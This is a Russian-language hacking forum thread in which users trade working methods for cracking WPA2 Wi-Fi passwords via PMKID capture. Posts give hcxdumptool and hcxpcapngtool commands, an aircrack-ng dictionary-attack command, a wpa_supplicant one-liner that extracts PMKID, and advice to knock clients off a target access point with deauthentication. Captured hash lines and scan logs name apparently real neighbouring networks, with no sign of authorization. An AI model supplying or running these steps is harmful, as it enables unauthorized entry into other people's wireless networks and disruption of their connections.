Брут WPA2 без handshake используя PMKID + hashcat

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Vikhedgehog, 6 Aug 2018.

  1. larinvlad

    larinvlad New Member

    Joined:
    20 Mar 2014
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?
    Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?

    В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.
     
  2. Mistral

    Mistral Elder - Старейшина

    Joined:
    30 Aug 2015
    Messages:
    2,945
    Likes Received:
    14,493
    Reputations:
    139
    https://forum.antichat.ru/threads/464369/page-2#post-4238069
     
  3. 4Fun

    4Fun Elder - Старейшина

    Joined:
    25 Jul 2018
    Messages:
    496
    Likes Received:
    709
    Reputations:
    11
    Вы получили строку с PMKID (требуется удалить пробелы). Вам нужно знать ESSID и BSSID точки доступа, а также MAC-адрес вашей беспроводной карты. Последний можно узнать командой:
    Code:
    iw dev
    Из BSSID, MAC удаляете разделители, а ESSID преобразовываете в HEX с помощью сервиса.
    Затем просто составляете строку формата:
    pmkid*bssid*mac*essid
    и записываете в файл с расширением .16800, который можно скормить Hashcat.
    WiFiPR: находите конструктор PMKID и заполняете поля этими данными.
     
    larinvlad likes this.
  4. bravephoenix748

    Joined:
    3 Jun 2018
    Messages:
    72
    Likes Received:
    21
    Reputations:
    1
    Если только в Wireless Password Recovery то проще с помощью конструктороа PMKID.
    https://www.passcape.com/wireless_password_recovery_pmkid_constructor_rus
    А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла
    AMAC это точка доступа ,а SMAC это ваш адаптер.Обратие внимание если у вас стоит в /etc/NetworkManager/conf.d/mac.conf
    как в Porteuse по умолчанию(клонирование мас)



    wifi.cloned-mac-address=stable то тот котрый был в момент подклбчения...
     
    #264 bravephoenix748, 11 Nov 2020
    Last edited: 11 Nov 2020
    larinvlad likes this.
  5. 4Fun

    4Fun Elder - Старейшина

    Joined:
    25 Jul 2018
    Messages:
    496
    Likes Received:
    709
    Reputations:
    11
    Важное замечание: в Aircrack-ng 1.6 добавлена возможность подавать PMKID как строку:
    Code:
    aircrack-ng -I "a33b5ba86374d241ab527a500124789b*c4c9ec10d0d2*acde489a876d*522d6c696e65" -w /path/to/dictionary
     
    Kevin Shindel likes this.
  6. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    @4Fun, прив!

    Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!?
    Не помешало бы его или ссылку на него добавить в шапку, да и твой тоже в соответствующей теме!
     
  7. 4Fun

    4Fun Elder - Старейшина

    Joined:
    25 Jul 2018
    Messages:
    496
    Likes Received:
    709
    Reputations:
    11
    Наработки в этом направлении есть, но полноценного списка нет. Собирал данные (BSSID, в первую очередь) с wpa-sec.stanev.org, с темы перебора на этом форуме. В планах насобирать большое количество различных BSSID и обобщить этот список в список шаблонов (можно сказать, регулярных выражений или масок).
     
  8. Af5G4337

    Af5G4337 Member

    Joined:
    17 Dec 2016
    Messages:
    94
    Likes Received:
    37
    Reputations:
    0
    Всем доброго!
    Пытаюсь проводить мероприятия в данном направлении. Поступаю так. Обычным аирслаксом сканирую сети, выбираю интересующую, включаю перехват и если клиентов нет, то просто пытаюсь подключиться с другого устройства. Потом смотрю акулой захваченный сар файл и всю необходимую инфу оттуда выцепляю. Заметил некоторую особенность, а именно:
    1. некотрые точки легко отдают все, мне необходимые, данные включая рмк
    2. некоторые вообще не отдают ни одного еапол пакета, хоть тресни.
    3. некоторые отдают рмк с номером 0400000000000000.....
    4. а вот некоторые, сперва молчат ка рыба об лед, а потом отдают валидный рмк но совсем не с первого, а с пятого - десятого подключения.
    Четвертый пункт мне показался интересным, сразу скажу, что все происходит с нормальным или хорошим уровнем сигнала, дальнобоем вообще не интересуюсь.
     
  9. Absolum

    Absolum Member

    Joined:
    28 Feb 2020
    Messages:
    64
    Likes Received:
    25
    Reputations:
    0
    Ребят. в видеоролике на ютубе - на 23 мин 40 сек

    PMKID атака | Новая техника не требующая клиентов на точке доступа | PMKID+Hashcat



    (у него Kali линукс) , на такую комманду:

    hcxpcaptool -i wlan0mon -о pmkid/capture.pcapng --enable status=15

    У человечка выдаёт такое:

    https://clip2net.com/s/4bbNOIp
    https://clip2net.com/s/4bbNOYE



    А у меня в Porteus линукс, который идёт с Airslax

    Его комманда:

    hcxpcaptool -i wlan0mon -о pmkid/capture.pcapng --enable status=15

    у меня не запустилась, но запустилась такая комманда:

    hcxdumptool -o test.pcapng -i wlan1mon --enable_status 15

    почему у меня выдаёт другое ?

    имею ввиду такие строки: (и так далее)

    17:55:12 4 ffffffffffff b0dfc1e39821 Tenda_E39820 [BEACON]
    17:55:20 6 ffffffffffff c4ad34753be8 MikroTik-753BE8 [BEACON]

    Может мой адаптер (pci): Wireless D-Link DWL-G520

    https://dlink.ru/ru/products/2/251.html

    не умеет аппаратно pmkid или ещё что то нужно набрать в терминале ?




    Вот мой полный текст из моего терминала:
    root@WiFI-Villain:~# hcxdumptool -o test.pcapng -i wlan1mon --enable_status 15
    initialization...
    warning: wlan1mon is probably a virtual monitor interface and some attack modes may not work as expected
    interface is already in monitor mode

    start capturing (stop with ctrl+c)
    NMEA 0183 SENTENCE........: N/A
    INTERFACE NAME............: wlan1mon
    INTERFACE PROTOCOL........: IEEE 802.11
    INTERFACE HARDWARE MAC....: 0015e945f4a8
    DRIVER....................: ath5k
    DRIVER VERSION............: 4.14.0-porteus
    DRIVER FIRMWARE VERSION...: N/A
    openSSL version...........: 1.1
    ERRORMAX..................: 100 errors
    BPF code blocks...........: 0
    FILTERLIST ACCESS POINT...: 0 entries
    FILTERLIST CLIENT.........: 0 entries
    FILTERMODE................: unused
    WEAK CANDIDATE............: 12345678
    ESSID list................: 0 entries
    ACCESS POINT (ROGUE)......: 0050c7610345 (BROADCAST HIDDEN)
    ACCESS POINT (ROGUE)......: 0050c7610346 (BROADCAST OPEN)
    ACCESS POINT (ROGUE)......: 0050c7610347 (incremented on every new client)
    CLIENT (ROGUE)............: b0ece1a25383
    EAPOLTIMEOUT..............: 20000 usec
    EAPOLEAPTIMEOUT...........: 2500000 usec
    REPLAYCOUNT...............: 63496
    ANONCE....................: 25096bf1d4b835378d4520ea635da21691758c21fa1dbc68e0f822c2d3a547bd
    SNONCE....................: 6a2e6ca4943be2b80d2ff3c26fa0a7c71f7ce6e05930d34aad80e40520763bd8

    17:55:03 1 ffffffffffff 28285dd5f6c8 Keenetic-8439 [BEACON]
    17:55:03 1 ffffffffffff 50ff2003e98c Keenetic-9791 [BEACON]
    17:55:04 2 ffffffffffff e4beed8a17a2 hello [BEACON]
    17:55:07 2 ffffffffffff 50ff2043a646 Keenetic-1983 [BEACON]
    17:55:12 4 ffffffffffff b0dfc1e39821 Tenda_E39820 [BEACON]
    17:55:20 6 ffffffffffff c4ad34753be8 MikroTik-753BE8 [BEACON]
    17:55:22 6 ffffffffffff 84c9b249b187 dlink [BEACON]
    17:55:28 8 ffffffffffff 647002cd7418 TP-LINK_CD7418 [BEACON]
    17:55:29 8 ffffffffffff 52ff2045e557 [HIDDEN BEACON]
    17:55:30 8 ffffffffffff 50ff2045e557 Keenetic-3662 [BEACON]
    17:55:36 10 ffffffffffff 74da881116a4 Pain inc. [BEACON]
    17:55:36 10 ffffffffffff cc32e570973d TP-Link_973D [BEACON]
    17:55:40 11 ffffffffffff c471540d26f2 TP-LINK_26F2 [BEACON]
    17:55:40 11 ffffffffffff 2c56dccff840 ASUS 99 [BEACON]
    17:55:40 11 ffffffffffff bcf6853c74f2 DIR-300NRUB6 [BEACON]
    17:55:42 11 ffffffffffff 8a7b5bd936c3 Nataly [BEACON]
    17:55:56 1 ffffffffffff 386b1ca432d6 MERCUSYS_32D6 [BEACON]
    17:55:56 1 ffffffffffff ee43f6d60020 armkart [BEACON]
    17:56:19 6 ffffffffffff 1e5bb3041694 AndroidAP3A19 [BEACON]
    17:56:24 8 ffffffffffff 50ff201ae7e0 Keenetic-7701 [BEACON]
    17:56:26 8 ffffffffffff 52ff204ae7e0 [HIDDEN BEACON]
     
  10. Absolum

    Absolum Member

    Joined:
    28 Feb 2020
    Messages:
    64
    Likes Received:
    25
    Reputations:
    0
    Наверное тут на форуме было это уже много раз тут. Но я лично не читал пока что про прогу CommView

    В ролике довольно быстро и просто вроде бы поймал - Pmkid:

    Конектился к wi-fi точке - с Любым паролем

    Extract PMKID On Windows Using CommView To Be Used On HashCat - YouTube

     
    #270 Absolum, 5 Mar 2021
    Last edited: 5 Mar 2021
  11. Alexmeh

    Alexmeh Elder - Старейшина

    Joined:
    19 Nov 2015
    Messages:
    2,344
    Likes Received:
    20,037
    Reputations:
    96
    Получилось?
    CommView - отстой!!!
     
    binarymaster and Spinus like this.
  12. Absolum

    Absolum Member

    Joined:
    28 Feb 2020
    Messages:
    64
    Likes Received:
    25
    Reputations:
    0
    он в ролике коннектился с Произвольным паролем. У него вроде получилось. посмотрите ролик
     
  13. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    Использовать это поделие и тем более рекомендовать его кому-либо, тут считается моветоном!
     
    binarymaster and Spinus like this.
  14. Absolum

    Absolum Member

    Joined:
    28 Feb 2020
    Messages:
    64
    Likes Received:
    25
    Reputations:
    0
    а ты не знаешь, что делать с этим Key , который мне выдала прога (или роутер ? ) на вкладке Other в WifiSlax 4.12 в программе WifiMetrropolis 3 ?

    это вообще что за аттака ? по wps ?

    попробовал с этим кеем приконнектиться к wi-fi - Tenda_E39820 - не коннектиться.

    потом попробовал его ввести как wps ключ и потом скан по wps через Reaver (в Airslax 5.14 pro) - но тишина.

    https://clip2net.com/s/4bd9hR8
     
  15. dart8888

    dart8888 Member

    Joined:
    1 Feb 2020
    Messages:
    249
    Likes Received:
    65
    Reputations:
    0
    да странно что в терминале часто при поимке хш вылазит типа "обнаружен мпкид" - по сути то одно и тоже? но отдельно не записывает (( печалька.
     
  16. bravephoenix748

    Joined:
    3 Jun 2018
    Messages:
    72
    Likes Received:
    21
    Reputations:
    1
    [​IMG]

    Я начинаю ловить PMKID cначала WifiMetropolis тк сразу получается PMKID в формате cap и его можно вставить сразу в WPR не извлекая вручную.Также сразу можно проверить на валидность пойманный PMKID нажав кнопку Aircrack-ng -там сразу видно валидный он или нет.
    Короче очень быстро ловится или если не ловится то понимаешь что он вообще не поймается тк нет клиентов.Тогда переходите к способу

    wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1

    Короче как выбрали целевую точку при сканировании- есть клиенты или нет сразу глушите точку- нажимайте кнопку DesAutenticacion(которая крайне правая и красная)
    Если клент есть он появится через 5-10 сек.Если нет то он и не появится.Наверное aircrack-ng скачет по каналам и не всегда видит клиентов.А тут когда сканируете на отельном канале то они появляются бытро.Если есть клиенты то нажимайте DesAutenticacion(левая чёрная)
    Естественно aircrack-ng 1.6 должен быть установлен.Кстати пользуюсь Wifislax 4.12 XFCE поздние версии KDE а это вроде зло:)

    [​IMG]
    Кстати разработчики Kali наконец-то:D по умолчанию ставаят самое нормальное окружение XFCE
     
    #276 bravephoenix748, 30 May 2021
    Last edited: 30 May 2021
  17. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Ребята помогите распарсить файлик.
    Запустил так ...
    Code:
    hcxdumptool -i wlan0 --disable_disassociations -o test.pcapng --enable_status=15
    потом сконвертил в новый формат.
    Code:
    hcxpcapngtool -o test.22000 test.pcapng
    на выходе файлик test.22000, содержание вида:

    Code:
    WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530*4ac1b5a688571792942695c66f672a836534df844ced1f8c30b926aaff75a233*0103007502010a00000000000000000002a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3edbac79a7786c931000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*02
    WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ecae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212809c9929a40a94cfe6fe8161d101a42e4030563*0103007502010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c81964faa7f44076fc40150affcb58b5ba3bbfb3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*02
    WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ecae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02030a001000000000000000027f0a607246336a6fe230e192fef5876b835b07dba5572c7760baf54993a685010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000*05
    Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей.
    Как определить какая из них какая ?
     
  18. antis17

    antis17 Well-Known Member

    Joined:
    25 Apr 2017
    Messages:
    158
    Likes Received:
    1,231
    Reputations:
    5
    HEX > ASCII
    554b7274656c65636f6d5f463838453530 - UKrtelecom_F88E50
    56696b61 - Vika
     
    Triton_Mgn, Kevin Shindel and user100 like this.
  19. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Тут получаются разные хэши изза того что разные маки использовались для конекшена... уже понял.

    Code:
    WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ecae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212809c9929a40a94cfe6fe8161d101a42e4030563*0103007502010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c81964faa7f44076fc40150affcb58b5ba3bbfb3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*02
    WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ecae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02030a001000000000000000027f0a607246336a6fe230e192fef5876b835b07dba5572c7760baf54993a685010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000*05
    Спасибо большое!
     
  20. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Еще вопрос как запустить софтину на 5 герцах?
    Указывать каналы через запятую как то не очень...
     
Loading...